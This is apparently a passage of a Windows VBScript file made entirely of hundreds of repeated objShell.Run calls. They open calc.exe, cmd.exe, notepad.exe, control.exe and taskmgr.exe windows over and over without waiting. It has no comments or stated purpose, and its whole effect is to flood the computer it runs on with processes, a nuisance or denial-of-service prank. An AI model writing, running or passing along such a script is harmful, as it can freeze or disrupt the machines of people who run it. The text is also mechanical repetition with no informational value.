objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

